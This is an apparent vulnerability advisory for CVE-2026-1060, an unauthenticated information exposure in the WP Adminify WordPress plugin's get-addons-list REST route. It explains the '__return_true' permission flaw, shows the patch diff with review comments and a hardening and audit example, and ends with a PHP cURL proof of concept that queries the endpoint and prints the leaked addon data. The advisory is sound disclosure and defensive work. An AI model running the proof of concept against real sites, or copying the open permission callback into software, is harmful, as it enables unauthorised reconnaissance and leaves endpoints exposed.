Atomic Edge analysis of CVE-2026-1060:
This vulnerability is an unauthenticated sensitive information exposure in the WP Adminify WordPress plugin. The flaw resides in a REST API endpoint that insecurely exposes the plugin’s addon list, installation status, and metadata. The CVSS score of 5.3 reflects a medium-severity information disclosure risk.
The root cause is an improper permission check on the `/wp-json/adminify/v1/get-addons-list` REST API endpoint. In the vulnerable code in `/adminify/Libs/Addons.php`, the `register_rest_route` call for this endpoint sets its `permission_callback` to `'__return_true'`. WordPress's `__return_true` helper returns `true` for every request, so the permission check passes unconditionally and no authentication or authorization is enforced. The commented-out line `'permission_callback' => [$this, 'adminify_is_admin_user'],` shows that the intended, secure configuration was present but disabled.
Exploitation is straightforward. An attacker sends a simple HTTP GET request to the vulnerable REST endpoint. No authentication, special headers, or parameters are required. The attack vector is the direct URL: `https://target-site.com/wp-json/adminify/v1/get-addons-list`. The server responds with a JSON object containing the complete list of WP Adminify addons, each entry detailing the addon name, slug, version, download URL, and installation status.
The patch, applied in version 4.0.7.8, corrects the `permission_callback` for the `get-addons-list` endpoint. The diff shows the line `'permission_callback' => '__return_true',` replaced with `'permission_callback' => [$this, 'adminify_is_admin_user'],`. This change delegates the access decision to the `adminify_is_admin_user()` method, which (its body is not part of the diff) presumably checks for administrator privileges before the callback `jltwp_adminify_get_addons_plugins_list` is allowed to execute and return data.
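The following is an added example, not WP Adminify's own code, illustrating the root cause and the fix described above: a route registration with a real permission callback in place of `'__return_true'`, plus a defender's audit that walks the registered REST routes and flags any still using the permissive callback. It assumes it runs inside WordPress (only core APIs are used) and that the `example_`-prefixed names are hypothetical.

```php
<?php
// Added example, not WP Adminify's code: a hardened get-addons-list route
// registration plus an audit for routes still using '__return_true' as their
// permission_callback. Runs inside WordPress (core APIs only); example_* names are hypothetical.
// Deny unless the user can manage the site; WP_Error yields 401/403 before the callback runs.
function example_adminify_addons_permission( WP_REST_Request $request ) {
    if ( current_user_can( 'manage_options' ) ) {
        return true;
    }
    return new WP_Error(
        'rest_forbidden',
        'You are not allowed to view the addon list.',
        array( 'status' => rest_authorization_required_code() )
    );
}

// Stand-in handler returning constructed sample data.
function example_get_addons_list( WP_REST_Request $request ) {
    return rest_ensure_response( array(
        array( 'name' => 'Example Addon', 'slug' => 'example-addon', 'version' => '1.0.0' ),
    ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'adminify/v1', '/get-addons-list', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'example_get_addons_list',
        // Vulnerable form: 'permission_callback' => '__return_true',
        'permission_callback' => 'example_adminify_addons_permission',
    ) );
} );

// Defender's audit: registered routes under $prefix whose permission_callback
// is '__return_true' or missing (WordPress treats a missing one as public).
function example_find_open_rest_routes( $prefix = '/adminify/' ) {
    $open = array();
    foreach ( rest_get_server()->get_routes() as $route => $handlers ) {
        if ( '' !== $prefix && 0 !== strpos( $route, $prefix ) ) {
            continue;
        }
        foreach ( $handlers as $handler ) {
            $perm = isset( $handler['permission_callback'] ) ? $handler['permission_callback'] : null;
            if ( null === $perm || '__return_true' === $perm ) {
                $open[] = $route;
            }
        }
    }
    return array_values( array_unique( $open ) );
}
```

Calling `example_find_open_rest_routes()` after `rest_api_init` (for instance from WP-CLI's `eval` or a must-use plugin) returns an empty array once every `adminify/v1` route has a real permission callback.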
Successful exploitation allows an unauthenticated attacker to retrieve sensitive information about the site’s WP Adminify plugin ecosystem. The exposed addon list, versions, and download URLs could aid in reconnaissance for further attacks, such as targeting known vulnerabilities in specific addon versions. While not directly enabling privilege escalation or remote code execution, this information exposure reduces the attacker’s effort in profiling the target and planning subsequent intrusion steps.
--- a/adminify/Inc/Classes/Notifications/Latest_Updates.php
+++ b/adminify/Inc/Classes/Notifications/Latest_Updates.php
@@ -58,7 +58,7 @@
{
if("dismissed" !== get_option('_wpadminify_plugin_update_info_notice', true )){
$jltwp_adminify_changelog_message = sprintf(
- __('%3$s %4$s %5$s <br> <strong>Check Changelogs for </strong> <a href="%1$s" target="__blank">%2$s</a>', 'adminify'),
+ __('%3$s %4$s <br> <strong>Check Changelogs for </strong> <a href="%1$s" target="__blank">%2$s</a>', 'adminify'),
esc_url_raw('https://wpadminify.com/changelogs'),
__('More about Updates ', 'adminify'),
/** Changelog Items
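Review bot: `target="__blank"` in the format string (present on both the removed and the added line) is not a valid target keyword; since this line is being rewritten anyway, change it to `target="_blank"` and add `rel="noopener"`. The drop from `%3$s %4$s %5$s` to `%3$s %4$s` matches the argument list shrinking by one in the next hunk, so the placeholders remain consistent.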
@@ -66,8 +66,7 @@
*/
'<h3 class="adminify-update-head">' . WP_ADMINIFY . ' <span><small><em>v' . esc_html(WP_ADMINIFY_VER) . '</em></small>' . __(' has some updates..', 'adminify') . '</span></h3><br>', // %3$s
- __('<span class="dashicons dashicons-yes"></span> <span class="adminify-changes-list"> <strong>Fixed:</strong> WP Dashboard Notes plugin "+ Add Note" button trigger issue fixed. </span><br>', 'adminify'),
- __('<span class="dashicons dashicons-yes"></span> <span class="adminify-changes-list"> <strong>Fixed:</strong> Admin bar menu some anchor tag mouse cursor style issue fixed. </span><br>', 'adminify'),
+ __('<span class="dashicons dashicons-yes"></span> <span class="adminify-changes-list"> <strong>Security:</strong> Security updated. </span><br>', 'adminify'),
);
printf(wp_kses_post($jltwp_adminify_changelog_message));
}
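Review bot: the new changelog entry "Security: Security updated." gives site owners no reason to prioritise the update; it should state that the `get-addons-list` REST route now requires administrator privileges, matching the change in `Addons.php`. Separately, the unchanged `printf(wp_kses_post($jltwp_adminify_changelog_message));` passes an already-formatted string as a printf format, so any literal `%` in a future changelog line would be misinterpreted; `echo wp_kses_post( $jltwp_adminify_changelog_message );` is the safer form.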
--- a/adminify/Libs/Addons.php
+++ b/adminify/Libs/Addons.php
@@ -54,8 +54,7 @@
register_rest_route('adminify/v1', '/get-addons-list', array(
'methods' => 'GET',
'callback' => [$this, 'jltwp_adminify_get_addons_plugins_list'],
- // 'permission_callback' => [$this, 'adminify_is_admin_user'],
- 'permission_callback' => '__return_true',
+ 'permission_callback' => [$this, 'adminify_is_admin_user'],
));
register_rest_route('adminify/v1', '/install-addons', array(
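Review bot: the `permission_callback` change is the actual fix, but `adminify_is_admin_user` is not in the diff, so a reviewer cannot confirm it returns `true`/`false` or a `WP_Error` (rather than echoing or exiting) and which capability it checks; `manage_options` or `install_plugins` would fit a list that includes download URLs and install status. The hunk also stops at the start of the `/install-addons` registration without showing its `permission_callback`; please confirm that route was not left with `__return_true` as well.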
--- a/adminify/adminify.php
+++ b/adminify/adminify.php
@@ -5,7 +5,7 @@
* Description: WP Adminify is a powerful plugin that modernizes and customizes your WordPress admin dashboard. It offers a clean, branded interface and advanced menu management features to enhance your admin user experience.
* Plugin URI: https://wpadminify.com
* Author: Jewel Theme
- * Version: 4.0.7.7
+ * Version: 4.0.7.8
* Author URI: https://wpadminify.com
* License: GPLv3 or later
* License URI: https://www.gnu.org/licenses/gpl-3.0.html
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1060 - WP Adminify <= 4.0.7.7 - Unauthenticated Sensitive Information Exposure via 'get-addons-list' REST API

// Configuration: Set the target WordPress site URL.
$target_url = 'https://example.com';
// Construct the full URL for the vulnerable REST API endpoint.
$api_endpoint = rtrim($target_url, '/') . '/wp-json/adminify/v1/get-addons-list';
// Initialize a cURL session.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $api_endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
// The endpoint uses the GET method and requires no authentication.
curl_setopt($ch, CURLOPT_HTTPGET, true);
// Execute the request and capture the response.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
// Check for cURL errors.
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}
curl_close($ch);
// Output the results.
echo "Target: " . $target_url . "\n";
echo "Endpoint: " . $api_endpoint . "\n";
echo "HTTP Status Code: " . $http_code . "\n\n";
if ($http_code == 200 && !empty($response)) {
    $data = json_decode($response, true);
    // A vulnerable site answers with a JSON array of addon entries.
    if (json_last_error() === JSON_ERROR_NONE && is_array($data)) {
        echo "[SUCCESS] Vulnerable endpoint accessed. Retrieved addon list.\n";
        echo "Addon Count: " . count($data) . "\n";
        echo "Sample Data:\n";
        // Print the first addon entry as a sample.
        if (!empty($data)) {
            $first_key = array_key_first($data);
            print_r($data[$first_key]);
        }
    } else {
        echo "[INFO] Received non-JSON or unexpected response. Raw output:\n";
        echo $response . "\n";
    }
} else {
    // A patched site (4.0.7.8+) returns 401 for anonymous requests.
    echo "[INFO] Request failed or endpoint not vulnerable (HTTP $http_code).\n";
    if (!empty($response)) {
        echo "Response Body:\n" . $response . "\n";
    }
}